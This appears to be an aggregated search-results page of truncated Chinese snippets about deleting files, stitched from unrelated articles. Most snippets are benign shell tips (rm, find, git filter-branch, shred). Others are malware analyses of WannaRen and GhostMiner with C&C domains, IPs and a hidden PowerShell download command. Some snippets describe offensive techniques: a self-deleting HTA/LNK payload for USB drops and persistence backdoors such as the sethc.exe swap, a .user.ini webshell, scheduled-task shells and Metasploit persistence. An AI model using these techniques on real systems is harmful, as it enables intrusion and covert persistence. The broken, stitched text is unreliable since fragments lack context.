DEL=1 DELUSER=$2 shift 2 ;; --rm) #删除文件 RM=1; RMFILE=$2...--rm命令,RMFILE是--rm后面接的需要操作文件。...for I in `echo $RMFILE | sed 's/,/ /g'`;do #sed 's/,/ /g' 或者 's@,@ @g' 将RMFILE里面的“,”去掉,因为你可能删除多个文件。...if test -e $I;then #-e判断该文件是否存在,然后-f是一般文件,-d是目录文件。...] && rm -r $I [ -d $I ] && rm -rf $I [ $DEBUG -eq 1 ] && echo "删除该文件成功
前言 我们都知道,在linux删除一个文件可以使用rm命令,但是有一些特殊名称的文件使用普通的rm方式却没法删除,本文介绍linux中删除特殊名称文件的多种方式。...但对于我们来说,不建议使用一些特殊字符来命名文件。不幸的是,我们可能无意中创建了一些特殊名称的文件,或者由程序意外的创建了一些由特殊字符组成的文件,这个时候,要删除它们,似乎没有想象中的那么简单。...*的文件就不能通过这样的方式删除,因为!*是有其他含义的 增加转义字符删除文件 既然!*无法通过加引号的方式删除,那还有什么办法吗?有!删除时,增加转义字符: $ rm \!* $ 这样便可以删除。...这种通过i节点号进行删除的方式适用于前面所提到的任何类型文件。 这里扩展说几句。在操作系统中,它是如何识别一个文件的呢?...总结 删除特殊文件名称的方法有很多,总结如下: 删除时带上路径 删除时使用 -- 删除时用引号引起来 使用转义字符辅助删除 按照i节点号删除 使用通配符删除 不同类型文件可选择使用上面所提较方便的方式进行删除
最近打包服务器上的apk包又增多了,每次手动rm操作过于麻烦,于是花了几分钟写了一个可以对指定目录下根据最后修改时间和通配符匹配进行批量删除的脚本。...将这个脚本加入crontab中之后,以后就再也不用担心多余的安装包占用磁盘空间了。 简短的代码 1 2 3 4 5 6 7 8 9 #!.../tmp目录下的,所有最后修改时间为3天前的apk文件,我们只需要这样执行。...,得到的结果就是glob匹配后的文件名(前提是通配符可以匹配到文件)。...如何遍历文件包含子目录内的 比如我们想遍历/tmp/abc/def.txt 我们可以使用/tmp/**/.txt即可
有时候gitignore没做好,一不小心就又进来一个二进制文件 在重复了N次Google之后,还是记一下吧 首先通过rev-list来找到仓库记录中的大文件: 1 git rev-list --objects...verify-pack -v .git/objects/pack/*.idx | sort -k 3 -n | tail -5 | awk '{print$1}')" 然后通过filter-branch来重写这些大文件涉及到的所有提交...index-filter 'git rm -rf --cached --ignore-unmatch your-file-name' --tag-name-filter cat -- --all 再删除缓存的对象
本文链接:https://blog.csdn.net/u011415782/article/details/102703393 背景 今天打开 linux 服务器,发现在根目录下出现了几百个雷同名字的文件...估计是被同行广告侵袭等操作产生的冗余文件 在此,想进行批量删除 ?...如上情况,则可以执行命令: # rm -rf auto_edit_shoumi_*.html.* 注意: 为了避免把无影响的其他文件删除,建议多匹配几个字符!
引言 在大多数情况下,我们习惯于使用 Delete 键、垃圾箱或 rm 命令从我们的计算机中删除文件,但这不是永久安全地从硬盘中(或任何存储介质)删除文件的方法。...假设文件包含密级或机密内容,例如安全系统的用户名和密码,具有必要知识和技能的攻击者可以轻松地恢复删除文件的副本并访问这些用户凭证(你可以猜测到这种情况的后果)。...在本文中,我们将解释一些命令行工具,用于永久并安全地删除 Linux 中的文件。 1.shred – 覆盖文件来隐藏内容 shred 会覆盖文件来隐藏它的内容,并且也可以选择删除它。 ?...你可以在 shred 的帮助页中找到更多的用法选项和信息: ? 2.wipe – 在 Linux 中安全删除文件 wipe 命令可以安全地擦除磁盘中的文件,从而不可能恢复删除的文件或目录内容。...3.Linux 中的安全删除工具集 secure-delete 是一个安全文件删除工具的集合,它包含用于安全删除文件的 srm(secure_deletion)工具。
3.创建当天备份目录 cd $backuppath mkdir -p $date cd $date 切换到备份目录中,根据当前时间来创建一个目录,用于存放当天的备份文件,再切换至当天的备份目录中。...5.定期删除备份文件 find $backuppath -type d -mtime +7 -exec rm -rf {} \; 只是一味地备份也不行,磁盘再大也有用完的那一天,况且很久以前的数据也没有任何意义...,我们需要备份的是近期最新的数据,所以定期删除文件就很有必要了。...-type d //表示查找目录,d表示目录 -mtime +7 //表示按照文件的更改时间来查找文件,+7表示距现在7天以前 -exec rm -rf {} \;...,可自行调整时间 [root@localhost ~]# systemctl restart crond //重启crond服务 总结: 以上脚本只是一个超简单简陋的版本,还有很多需要改进的地方
time=_` date +%Y_%m_%d_%H_%M_%S ` #需要备份的数据库名称 db_name=test #mysql 用户名 db_user=root #mysql 密码 db_pass...=123456 mysqldump -u $db_user -p$db_pass $db_name | gzip > $backupdir/$db_name$time.sql.gz #删除一分钟之前的备份文件...db_name:数据库名; db_user:数据库用户名; db_pass:用户密码; -type f 表示查找普通类型的文件,f表示普通文件。...-mtime +7 按照文件的更改时间来查找文件,+7表示文件更改时间距现在7天以前;如果是 -mmin +7 表示文件更改时间距现在7分钟以前。...-exec rm {} ; 表示执行一段shell命令,exec选项后面跟随着所要执行的命令或脚本,然后是一对儿{},一个空格和一个,最后是一个分号。
’;’连接符,否则生成的文件名末尾字符为乱码 代码: #!...-type f 表示查找普通类型的文件,f表示普通文件。...-exec rm {} \; 表示执行一段shell命令,exec选项后面跟随着所要执行的命令或脚本,然后是一对儿{ },一个空格和一个\,最后是一个分号。...:每周;/etc/cron.monthly:每月)中脚本出来运行的方式。...Redhat中只需要将刚才编辑的脚本复制到相应的目录即可。
在用VS做MFC编程时,新建的工程中自带了文件视图/类视图/属性窗口/输出窗口等内容。文件视图FileView中具有初始右键菜单,如图所示: ?...,与FileView相关的很难找到,应该是因为平常多数人用到的右键菜单都是给某个对话框窗体添加自定义的菜单,会涉及到右键点击事件OnRButtonDown ; WM_CONTEXTMENU消息等。 ...然而这里我是想给文件视图中已有的右键菜单添加几个菜单项,增加功能。...通过仔细分析上面的代码发现,在最后一句通过ShowPopupMenu方法绑定了ID为IDR_POPUP_EXPLORER的资源,这才是真正的菜单所在,于是转到IDR_POPUP_EXPLORER的定义,...打开后可以添加/修改/删除菜单项,如图: ? 最后给菜单项添加响应事件,实现代码即可。
该病毒会在用户桌面及磁盘根目录创建多个勒索提示信息文件,包括:@WannaRen@.exe、想解密请看此图片.gif、想解密请看此文本.txt、想解密请看此文本.gif、团队解密.jpg。 ?...A 首先病毒名称蹭了“前任”WannaCry的热度,甚至还高度模仿其解密工具;其次攻击者使用了多个吸引眼球的图片,包括勒索信息图片及解密工具界面。 ? Q 该病毒执行流程是什么样的?...A 首先从攻击者的C&C域名(cpu.sslsngyl90.com)下载PowerShell脚本文件并执行,可在系统日志中查看到相应的PowerShell执行记录。...A 从目前已知的案例来看,攻击者主要是通过PowerShell脚本下发病毒母体的方式来执行加密,同时病毒加载器会执行自删除操作,并未发现横向传播的蠕虫特征。...但PowerShell脚本中同时还存在EternalBlue(永恒之蓝)MS17-010漏洞的利用模块,不排除攻击者后续可能结合该漏洞进行传播的可能。 ? Q 如何防范该病毒的进一步传播?
当触发eventconsumer时,它将从已安装的wmi“powershell command”对象的command和ccbot中读取条目。 执行命令脚本时,将执行以下操作: ?...除了上述功能外,命令脚本还有一个wmi_killer函数,该函数终止正在运行的进程,并删除与恶意软件系相关联的计划任务和服务,例如: 1.Mykings 2.PowerGhost 3.PCASTLE 4...另一个命令脚本函数wmi_checkhosts能够修改受感染计算机的主机文件。 ? 同时,ccbot使用两个ip地址,即118.24.63.208和103.105.59.68作为c&c服务器。...但是,在删除之前,ghostminer会确定根驱动器上的可用磁盘空间。如果可用空间小于1 GB,则会减少10 MB大小的负载。...然后ghostminer将追加2130字节的随机值,该文件将保存为C:\windows\temp\lsass.exe。 恶意软件随后将执行以下命令: ? IOCs ?
,提示我们要启动一个外部程序 这个时候我们在点击启动之后,会看见一个powershell的窗口一闪而过,可以知道样本执行了一段powershell的脚本 ?...我们将样本后缀名改为zip,看看这段powershell 代码在何处,我们最终在ppt\slides中找到了这段powershell脚本 ?...我们来看看这段powershell 脚本(已还原),可以看到是下载一个php文件放到临时文件夹,并重命名为ii.jse powershell -NoP -NonI -W Hidden -ExecBypass...然后拷贝自身到如下目录下,重命名位mqnets.exe,并执行 ? 并删除自身 ? 我们看看在拷贝到IE目录下样本会做些什么,在这里比较是在IE目录下的时候,会发生跳转 ?...第五个线程主要是判断Temp文件是否如下图的文件,如果有壳杀死自身,并删除自身 ? ? 总结 样本在对抗沙箱和模拟机中有很强的针对性,在持久话方面也很独特,值得研究一下
我们可以提供一个更完整的批处理脚本和PowerShell脚本。确保它们都能正确处理带有前缀“选区-”的文件名。...批处理脚本(.bat): 以下是改进后的批处理脚本,使用dir /b /a-d列出文件,并确保正确处理包含非ASCII字符的文件名: @echo off setlocal enabledelayedexpansion...chcp 65001 >nul :: 要删除的前缀 set "prefix=选区-" :: 要保留的后缀 set "suffix=.jpg" :: 确保批处理脚本能够正确处理非ASCII字符 chcp...复制上述PowerShell脚本代码并粘贴到文本编辑器中。 将文件保存为remove_prefix.ps1。...运行PowerShell脚本: 将remove_prefix.ps1放在需要批量删除前缀的文件所在的目录。 右键单击脚本文件并选择“使用PowerShell运行”。
LNK将执行HTA,HTA将依次执行并删除的DLL payload,并且用诱饵图片替换快捷方式(confidential.jpg)。...如果你此时双击pic.hta,会生成wuyifan.jpg,但是此时pic.hta没有自删除 4.整合上述的两步形成一个自删除的HTA文件:打开pic.hta将AutoOpen函数名修改为AutoOpen2...删除payload.hta的vb代码的后两行(AutoOpen和Close),将pic.hta中的vb代码(除了最后两行AutoOpen和Close)复制到payload.hta的vb脚本末尾,后并添加以下代码..."" "mshta" "%CD%\confidential.jpg.lnk" 当payload构成放在USB中,我们需要知道当前路径,%cd%将提供当前的路径名称 使用macro_pack生成lnk...这里有个问题是setcontent-ms文件默认在“C:\Windows\System32”中打开,这样我们必须知道USB的盘符,为此使用Powershell的脚本如下: %windir%\system32
0xFEFF的字节顺序标记(BOM)出现在文件的开始部分(标记Unicode文本流的开始),其中包含了隐藏的批处理文件代码。下面给出的是我们使用十六进制编辑器打开后所看到的内容: ?...使用PowerShell命令,并下载一个PowerShell脚本以及PShellExec.exe; ? 3....通过使用PShellExec.exe,它首先会对下载下来的PowerShell脚本进行加密,然后删除原始脚本,并运行加密后的脚本; ? 4....最后,它会创建一个VBScript脚本,并执行加密后的PowerShell脚本。为了实现持久化感染,它还会在目标系统的启动目录STARTUP文件夹中创建一个符号链接; ?...判断目标操作系统是32位还是64位的,并下载相应的DLL文件; ?
可以使用该对象中的 信息(如脚本的路径和文件名 ($myinvocation.mycommand.path) 或函数的名称 ($myinvocation.mycommand.name))来标识当前命令。...对于查找正在运行的脚本的名称,这非常有用。 $NULL 包含 NULL 或空值。可以在命令和脚本中使用此变量表示 NULL,而不是使用字符串”NULL”。...$Profile 包含当前用户和当前主机应用程序的 Windows PowerShell 配置文件的完整路径。可以在命令 中使用此变量表示配置文件。...Import-Clixml: 导入 CLIXML 文件,并在 Windows PowerShell 中创建相应的对象。...{ "发生异常,异常信息为$($error[0])"; break } "删除文件成功!"
C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe,放回文件夹中这次按5次shift键就可以打开cmd了 ?...①在目录下创建一个.user.ini文件,内容如下 auto_prepend_file=test.jpg ②然后再创建一个test.jpg文件,内容如下 <?...Powershell权限维持 参考此Powershell脚本:https://github.com/re4lity/Schtasks-Backdoor 利用代码 ①在cmd中输入nc -lvp 9999...serverces ,并自动保存为开机自动启动。...推荐使用该参数; -i:设置反向连接间隔时间,单位为秒; -p:设置反向连接的端口号; -r:设置反向连接的ip地址。 MSF会在目标主机中生成一个vbs文件,并执行 ?
) Windows中加载并执行PowerShell脚本 本地加载并执行PowerShell脚本 远程下载并执行PowerShell脚本 Windows中的批处理文件 Windows中快捷键操作 Windows...中加载并执行PowerShell脚本 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...更多的关于PowerShell的用法:PowerShell使用浅析 本地加载并执行PowerShell脚本 在cmd当前目录下有PowerView.ps1脚本,并执行其中的Get-Netdomain模块...\powerview.ps1;Get-NetDomain 远程下载并执行PowerShell脚本 远程下载并执行test.ps1脚本、远程下载PowerView.ps1脚本,并执行其中的Get-Netdomain...,相应打开文件所要调用的程序等等信息。
1、New-Item 创建新项命令cmdlet New-Item 将创建新项并设置其值。 可创建的项类型取决于项的位置。 例如,在文件系统 New-Item 中创建文件和文件夹。...表示当前操作目录-Value 指定文件内容常用参数介绍 ● -Name:指定新项的名称。...可以指定新项的名称或者指定新项的路径 ● -Path:指定新项的位置的路,如果省略的话表示当前目录,支持多个字符串通过逗号分割 ● -ItemType:指定新项目的指定提供者的类型(File 文件,SymbolLink...2、Remove-Item 删除项命令Remove-Item cmdlet 删除一个或多个项。它支持删除许多不同类型的项,包括文件、文件夹、注册表项、变量、别名和函数。...删除当前目录的demo.txt文件Remove-item demo.txt删除当前目录所有扩展名是jpg的文件,文件名不包括*test*的文件Remove-Item * -Include *.jpg -
领取专属 10元无门槛券
手把手带您无忧上云